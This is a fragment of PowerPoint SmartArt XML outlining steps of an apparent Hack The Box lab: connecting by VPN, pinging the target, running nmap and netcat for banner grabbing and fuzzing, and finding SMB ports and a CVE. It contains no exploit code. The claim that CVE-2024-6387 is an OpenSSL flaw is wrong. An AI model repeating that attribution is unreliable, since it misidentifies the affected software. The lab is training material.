    <dgm:cxn modelId="{D61B8015-F9F4-4ACA-8550-C354EDD95E00}" type="presParOf" srcId="{801D8475-52F3-44A8-B4D3-246C149E3A34}" destId="{31F0C0EE-BA56-4323-9CF8-26EA11EA1BD7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{DCB30C90-35B2-4E84-A48B-8772DE7DAC6C}" type="presParOf" srcId="{801D8475-52F3-44A8-B4D3-246C149E3A34}" destId="{A3ACD7D3-24F8-4DDE-B3D5-083FBCA997E0}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{046A99CD-B227-40C8-B9C5-39E37F41C2EA}" type="presParOf" srcId="{801D8475-52F3-44A8-B4D3-246C149E3A34}" destId="{E1D8A8D9-6F8B-40D5-A0DA-75DE358048C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ED82F9-E85F-49F0-B161-F8E13AB65273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37060DE-F2EB-4067-BEBF-84FBBC8685B6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t>-&gt;  Connect to HTB either via </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" err="1">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t>openVPN</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t> or PWN.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="Times New Roman"/>
            <a:cs typeface="Times New Roman"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0870F85B-1436-488E-A4F0-483176C5F78A}" type="parTrans" cxnId="{85A66B43-B9B1-4786-B643-BCAD5B701341}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5B87747D-45E9-4DDC-9353-528F9275BDE0}" type="sibTrans" cxnId="{85A66B43-B9B1-4786-B643-BCAD5B701341}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BC6D0A87-77DA-4CE7-9AD9-15D168EED9AC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t>-&gt; Start instance and fetch the IP address and port number along with the necessary download files.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="Times New Roman"/>
            <a:cs typeface="Times New Roman"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1943F03B-E949-4D84-963B-5B44DA853461}" type="parTrans" cxnId="{887526E8-EB1B-4DD7-BCC1-AF79E3E919F6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F6BC339F-AA38-4AA2-B3BA-0ED258E84E8E}" type="sibTrans" cxnId="{887526E8-EB1B-4DD7-BCC1-AF79E3E919F6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{418C1FD8-ED7B-4C1D-A244-44F8B94DA868}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t>-&gt; We connect to the IP address and make sure that it is pingable.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="Times New Roman"/>
            <a:cs typeface="Times New Roman"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FB317202-BA2B-4822-B701-6B965170F372}" type="parTrans" cxnId="{09E897B5-4889-4BDA-AC3C-26A2BF77D6EE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64B9BD77-E78F-4BE2-8D72-FBC242E70FEB}" type="sibTrans" cxnId="{09E897B5-4889-4BDA-AC3C-26A2BF77D6EE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CB07918A-9645-401A-8FBA-AC20484EB257}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t>-&gt; We ran </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" err="1">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t>nmap</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t> and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" err="1">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t>netcat</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t> on the server IP for banner grabbing, checking HTTP headers and manual  fuzzing for common vulnerabilities.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="Times New Roman"/>
            <a:cs typeface="Times New Roman"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1BCF0FCB-D005-473E-BA77-498FBEC4503C}" type="parTrans" cxnId="{3F11DB4F-CDDC-4441-9028-1ECEFB3059C2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8FD68B9E-9023-49FB-8513-C9918656E651}" type="sibTrans" cxnId="{3F11DB4F-CDDC-4441-9028-1ECEFB3059C2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1928EBDD-4C85-41A3-B285-D9B60EE7669B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t>-&gt; We discovered an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" err="1">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t>openssl</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t> vulnerability: CVE 2024-6387: </a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="Times New Roman"/>
            <a:cs typeface="Times New Roman"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7984C21-80FB-47EC-BB39-E8A5B1E5F454}" type="parTrans" cxnId="{D83C4EDA-F605-4B6B-AE4D-52DA3F5B8406}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{280C25FB-A4A5-4875-B4D9-C65117EC2F59}" type="sibTrans" cxnId="{D83C4EDA-F605-4B6B-AE4D-52DA3F5B8406}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4A62ADE7-6F15-4E7E-9D00-40F839677C6F}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t>-&gt; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:rPr>
            <a:t>139, 445 (Samba-related ports) – suggesting potential SMB exposure</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A4B35A5D-3681-4A1F-A596-EDAD6482A848}" type="parTrans" cxnId="{F5387B20-6C99-450E-B9A9-838E66A03B44}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FB929B42-9E33-49F0-9735-3A47F1D20815}" type="sibTrans" cxnId="{F5387B20-6C99-450E-B9A9-838E66A03B44}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7ED68249-8ACF-4155-9848-4E4A90AE5670}" type="pres">
      <dgm:prSet presAssocID="{E1ED82F9-E85F-49F0-B161-F8E13AB65273}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CE54430D-A794-40CD-B3CC-7BD1EB03CABD}" type="pres">
      <dgm:prSet presAssocID="{737060DE-F2EB-4067-BEBF-84FBBC8685B6}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{516EB327-953B-47E0-B7D8-72C9CF2DAFB7}" type="pres">
      <dgm:prSet presAssocID="{5B87747D-45E9-4DDC-9353-528F9275BDE0}" presName="sibTrans" presStyleLbl="sibTrans1D1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9C1EB90B-C0F7-4989-8F32-FFDCD453347C}" type="pres">
      <dgm:prSet presAssocID="{5B87747D-45E9-4DDC-9353-528F9275BDE0}" presName="connectorText" presStyleLbl="sibTrans1D1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{50851DCE-81E3-445C-B0DA-5E5512DE6FCF}" type="pres">
      <dgm:prSet presAssocID="{BC6D0A87-77DA-4CE7-9AD9-15D168EED9AC}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5DFA05A8-22D2-4707-B7CF-9B5626A90F38}" type="pres">
      <dgm:prSet presAssocID="{F6BC339F-AA38-4AA2-B3BA-0ED258E84E8E}" presName="sibTrans" presStyleLbl="sibTrans1D1" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C2AF12F0-F830-4852-A382-AC6DC71FA95C}" type="pres">
      <dgm:prSet presAssocID="{F6BC339F-AA38-4AA2-B3BA-0ED258E84E8E}" presName="connectorText" presStyleLbl="sibTrans1D1" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BAF20D91-C2EC-4016-B09A-4ABE8470E2ED}" type="pres">
      <dgm:prSet presAssocID="{418C1FD8-ED7B-4C1D-A244-44F8B94DA868}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{75DE83CA-1446-4CC9-B216-1248D22C579F}" type="pres">
      <dgm:prSet presAssocID="{64B9BD77-E78F-4BE2-8D72-FBC242E70FEB}" presName="sibTrans" presStyleLbl="sibTrans1D1" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6AD98089-4BE2-494C-8017-75DAA2B51599}" type="pres">
      <dgm:prSet presAssocID="{64B9BD77-E78F-4BE2-8D72-FBC242E70FEB}" presName="connectorText" presStyleLbl="sibTrans1D1" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6C42A663-A072-49D8-A347-1A3487339C87}" type="pres">
      <dgm:prSet presAssocID="{CB07918A-9645-401A-8FBA-AC20484EB257}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0004756B-94C7-4337-A08F-2BC00A4C57E4}" type="pres">
      <dgm:prSet presAssocID="{8FD68B9E-9023-49FB-8513-C9918656E651}" presName="sibTrans" presStyleLbl="sibTrans1D1" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0FAE2704-E67F-469F-9E2E-28E8F4B4AD5B}" type="pres">
      <dgm:prSet presAssocID="{8FD68B9E-9023-49FB-8513-C9918656E651}" presName="connectorText" presStyleLbl="sibTrans1D1" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{00C0D873-FDB4-43B3-8745-6D8D7026A357}" type="pres">
      <dgm:prSet presAssocID="{1928EBDD-4C85-41A3-B285-D9B60EE7669B}" presName="node" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BAA20668-4968-44F2-B76D-434C72C633D6}" type="pres">
      <dgm:prSet presAssocID="{280C25FB-A4A5-4875-B4D9-C65117EC2F59}" presName="sibTrans" presStyleLbl="sibTrans1D1" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6CECB7AE-3576-4085-811E-037772829E22}" type="pres">
      <dgm:prSet presAssocID="{280C25FB-A4A5-4875-B4D9-C65117EC2F59}" presName="connectorText" presStyleLbl="sibTrans1D1" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{84CE5DD9-C805-4E2E-817A-1A0B994246F1}" type="pres">
      <dgm:prSet presAssocID="{4A62ADE7-6F15-4E7E-9D00-40F839677C6F}" presName="node" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{5A8D0D02-5692-405A-9195-D35924F7D994}" type="presOf" srcId="{5B87747D-45E9-4DDC-9353-528F9275BDE0}" destId="{516EB327-953B-47E0-B7D8-72C9CF2DAFB7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{F7298102-EDE3-4CC6-9242-363345A99D85}" type="presOf" srcId="{280C25FB-A4A5-4875-B4D9-C65117EC2F59}" destId="{6CECB7AE-3576-4085-811E-037772829E22}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{BD561F05-9A6D-4A05-B092-583945F18408}" type="presOf" srcId="{E1ED82F9-E85F-49F0-B161-F8E13AB65273}" destId="{7ED68249-8ACF-4155-9848-4E4A90AE5670}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{B7CAD40A-489B-495B-82F2-EBC9B6A3309D}" type="presOf" srcId="{4A62ADE7-6F15-4E7E-9D00-40F839677C6F}" destId="{84CE5DD9-C805-4E2E-817A-1A0B994246F1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{7A27EC0E-68FE-4B1F-A58D-6344C57F55A0}" type="presOf" srcId="{64B9BD77-E78F-4BE2-8D72-FBC242E70FEB}" destId="{6AD98089-4BE2-494C-8017-75DAA2B51599}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{F5387B20-6C99-450E-B9A9-838E66A03B44}" srcId="{E1ED82F9-E85F-49F0-B161-F8E13AB65273}" destId="{4A62ADE7-6F15-4E7E-9D00-40F839677C6F}" srcOrd="5" destOrd="0" parTransId="{A4B35A5D-3681-4A1F-A596-EDAD6482A848}" sibTransId="{FB929B42-9E33-49F0-9735-3A47F1D20815}"/>
    <dgm:cxn modelId="{FAB3DB2C-6122-4DA7-AD08-DB415C585A61}" type="presOf" srcId="{64B9BD77-E78F-4BE2-8D72-FBC242E70FEB}" destId="{75DE83CA-1446-4CC9-B216-1248D22C579F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{85A66B43-B9B1-4786-B643-BCAD5B701341}" srcId="{E1ED82F9-E85F-49F0-B161-F8E13AB65273}" destId="{737060DE-F2EB-4067-BEBF-84FBBC8685B6}" srcOrd="0" destOrd="0" parTransId="{0870F85B-1436-488E-A4F0-483176C5F78A}" sibTransId="{5B87747D-45E9-4DDC-9353-528F9275BDE0}"/>
    <dgm:cxn modelId="{3F11DB4F-CDDC-4441-9028-1ECEFB3059C2}" srcId="{E1ED82F9-E85F-49F0-B161-F8E13AB65273}" destId="{CB07918A-9645-401A-8FBA-AC20484EB257}" srcOrd="3" destOrd="0" parTransId="{1BCF0FCB-D005-473E-BA77-498FBEC4503C}" sibTransId="{8FD68B9E-9023-49FB-8513-C9918656E651}"/>
    <dgm:cxn modelId="{4B87777C-CF44-4B3C-BC7E-58396108DECA}" type="presOf" srcId="{CB07918A-9645-401A-8FBA-AC20484EB257}" destId="{6C42A663-A072-49D8-A347-1A3487339C87}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{DC862E89-9505-4B10-87B9-7C0D40648758}" type="presOf" srcId="{418C1FD8-ED7B-4C1D-A244-44F8B94DA868}" destId="{BAF20D91-C2EC-4016-B09A-4ABE8470E2ED}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{6619138E-3D2D-4636-BB91-D24577C285FB}" type="presOf" srcId="{F6BC339F-AA38-4AA2-B3BA-0ED258E84E8E}" destId="{C2AF12F0-F830-4852-A382-AC6DC71FA95C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{9796AB94-B8D8-41BF-8EB2-C914BAF2AFF3}" type="presOf" srcId="{BC6D0A87-77DA-4CE7-9AD9-15D168EED9AC}" destId="{50851DCE-81E3-445C-B0DA-5E5512DE6FCF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{8778D195-79FF-4B81-8733-7D3BAFA92AD8}" type="presOf" srcId="{280C25FB-A4A5-4875-B4D9-C65117EC2F59}" destId="{BAA20668-4968-44F2-B76D-434C72C633D6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{1C155596-D517-4F4C-B0D5-BC8649BDA14F}" type="presOf" srcId="{8FD68B9E-9023-49FB-8513-C9918656E651}" destId="{0FAE2704-E67F-469F-9E2E-28E8F4B4AD5B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{09E897B5-4889-4BDA-AC3C-26A2BF77D6EE}" srcId="{E1ED82F9-E85F-49F0-B161-F8E13AB65273}" destId="{418C1FD8-ED7B-4C1D-A244-44F8B94DA868}" srcOrd="2" destOrd="0" parTransId="{FB317202-BA2B-4822-B701-6B965170F372}" sibTransId="{64B9BD77-E78F-4BE2-8D72-FBC242E70FEB}"/>
    <dgm:cxn modelId="{6B554BB8-A547-4D29-801D-2312DDFEDF27}" type="presOf" srcId="{737060DE-F2EB-4067-BEBF-84FBBC8685B6}" destId="{CE54430D-A794-40CD-B3CC-7BD1EB03CABD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{B08DC5B9-39A9-4017-B28A-F2A5288A5D3A}" type="presOf" srcId="{8FD68B9E-9023-49FB-8513-C9918656E651}" destId="{0004756B-94C7-4337-A08F-2BC00A4C57E4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{F84D39BE-3123-4117-8BE4-76AB614968EF}" type="presOf" srcId="{1928EBDD-4C85-41A3-B285-D9B60EE7669B}" destId="{00C0D873-FDB4-43B3-8745-6D8D7026A357}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{6C2B4CC8-B9D6-4DCA-9236-CA2A4774193B}" type="presOf" srcId="{5B87747D-45E9-4DDC-9353-528F9275BDE0}" destId="{9C1EB90B-C0F7-4989-8F32-FFDCD453347C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{D83C4EDA-F605-4B6B-AE4D-52DA3F5B8406}" srcId="{E1ED82F9-E85F-49F0-B161-F8E13AB65273}" destId="{1928EBDD-4C85-41A3-B285-D9B60EE7669B}" srcOrd="4" destOrd="0" parTransId="{C7984C21-80FB-47EC-BB39-E8A5B1E5F454}" sibTransId="{280C25FB-A4A5-4875-B4D9-C65117EC2F59}"/>
    <dgm:cxn modelId="{887526E8-EB1B-4DD7-BCC1-AF79E3E919F6}" srcId="{E1ED82F9-E85F-49F0-B161-F8E13AB65273}" destId="{BC6D0A87-77DA-4CE7-9AD9-15D168EED9AC}" srcOrd="1" destOrd="0" parTransId="{1943F03B-E949-4D84-963B-5B44DA853461}" sibTransId="{F6BC339F-AA38-4AA2-B3BA-0ED258E84E8E}"/>
    <dgm:cxn modelId="{D77728F8-6422-427F-8094-F557D9734737}" type="presOf" srcId="{F6BC339F-AA38-4AA2-B3BA-0ED258E84E8E}" destId="{5DFA05A8-22D2-4707-B7CF-9B5626A90F38}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{53B73445-1088-441B-A038-A1D31B9C9717}" type="presParOf" srcId="{7ED68249-8ACF-4155-9848-4E4A90AE5670}" destId="{CE54430D-A794-40CD-B3CC-7BD1EB03CABD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{CFA7F52E-0A24-4FE9-9B23-1681A1B5BDA1}" type="presParOf" srcId="{7ED68249-8ACF-4155-9848-4E4A90AE5670}" destId="{516EB327-953B-47E0-B7D8-72C9CF2DAFB7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{6837D32B-0950-4CB1-8A01-4FDF27097533}" type="presParOf" srcId="{516EB327-953B-47E0-B7D8-72C9CF2DAFB7}" destId="{9C1EB90B-C0F7-4989-8F32-FFDCD453347C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{C9AA1CEA-3E7E-4EA1-9FF7-F940E9792A6E}" type="presParOf" srcId="{7ED68249-8ACF-4155-9848-4E4A90AE5670}" destId="{50851DCE-81E3-445C-B0DA-5E5512DE6FCF}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{05A18F51-A1D3-4724-B811-406153377AE3}" type="presParOf" srcId="{7ED68249-8ACF-4155-9848-4E4A90AE5670}" destId="{5DFA05A8-22D2-4707-B7CF-9B5626A90F38}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{6F7665CE-DC63-42B0-8E0B-18722DD46641}" type="presParOf" srcId="{5DFA05A8-22D2-4707-B7CF-9B5626A90F38}" destId="{C2AF12F0-F830-4852-A382-AC6DC71FA95C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{BEF8C11E-9D37-4933-8BA4-DA40B6C6E4CA}" type="presParOf" srcId="{7ED68249-8ACF-4155-9848-4E4A90AE5670}" destId="{BAF20D91-C2EC-4016-B09A-4ABE8470E2ED}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{E4860376-29D2-4A49-A49E-E1FCED9A0499}" type="presParOf" srcId="{7ED68249-8ACF-4155-9848-4E4A90AE5670}" destId="{75DE83CA-1446-4CC9-B216-1248D22C579F}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{02295BD7-6BBA-417D-9D0D-273A39FC7C4D}" type="presParOf" srcId="{75DE83CA-1446-4CC9-B216-1248D22C579F}" destId="{6AD98089-4BE2-494C-8017-75DAA2B51599}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{04FE4A21-9FB8-44DC-858A-5BA89C3FE932}" type="presParOf" srcId="{7ED68249-8ACF-4155-9848-4E4A90AE5670}" destId="{6C42A663-A072-49D8-A347-1A3487339C87}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{A019FE91-B037-484E-88BA-238454CACAF5}" type="presParOf" srcId="{7ED68249-8ACF-4155-9848-4E4A90AE5670}" destId="{0004756B-94C7-4337-A08F-2BC00A4C57E4}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
